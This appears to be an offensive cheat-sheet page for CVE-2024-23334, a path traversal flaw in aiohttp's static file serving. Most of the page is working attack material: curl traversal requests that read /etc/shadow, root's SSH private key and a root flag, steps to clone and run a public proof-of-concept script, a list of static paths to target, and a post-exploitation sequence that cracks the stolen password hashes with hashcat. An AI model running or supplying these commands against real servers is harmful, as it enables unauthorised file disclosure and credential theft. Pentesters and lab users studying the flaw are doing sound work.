aiohttp

aiohttp is an asynchronous HTTP client/server framework for Python.

CVE-2024-23334 - Path Traversal / LFI

Vulnerable versions: aiohttp < 3.9.2

Detection:

Check server headers for aiohttp version:

HTTP/1.1 200 OK
Server: Python/3.9 aiohttp/3.9.1

Exploitation

The vulnerability allows path traversal to read files outside the web root when static file serving is enabled.

Manual exploitation:

# Read /etc/passwd
curl "http://target:8080/assets/../../../etc/passwd"

# Read /etc/shadow (if running as root)
curl "http://target:8080/assets/../../../etc/shadow"

# Read root flag
curl "http://target:8080/assets/../../../root/root.txt"

# Read SSH keys
curl "http://target:8080/assets/../../../root/.ssh/id_rsa"

Using the POC script:

git clone https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC.git
cd LFI-aiohttp-CVE-2024-23334-PoC

# Read specific file
./lfi_aiohttp.sh -f "/etc/passwd"
./lfi_aiohttp.sh -f "/root/root.txt"
./lfi_aiohttp.sh -f "/etc/shadow"

Common Static Paths to Target

/assets/
/static/
/files/
/css/
/js/
/images/

Post-Exploitation

If running as root and /etc/shadow is readable:

# Extract shadow file
./lfi_aiohttp.sh -f "/etc/shadow" > shadow

# Get passwd
./lfi_aiohttp.sh -f "/etc/passwd" > passwd

# Crack hashes
unshadow passwd shadow > unshadow.txt
hashcat -m 1800 unshadow.txt /usr/share/wordlists/rockyou.txt

References

https://github.com/TheRedP4nther/LFI-aiohttp-CVE-2024-23334-PoC
https://nvd.nist.gov/vuln/detail/CVE-2024-23334

PreviousPymatgen CIF Parser NextNetdata

Last updated 20 days ago

hashtagCVE-2024-23334 - Path Traversal / LFI

hashtagExploitation

hashtagCommon Static Paths to Target

hashtagPost-Exploitation

hashtagReferences

CVE-2024-23334 - Path Traversal / LFI

Exploitation

Common Static Paths to Target

Post-Exploitation

References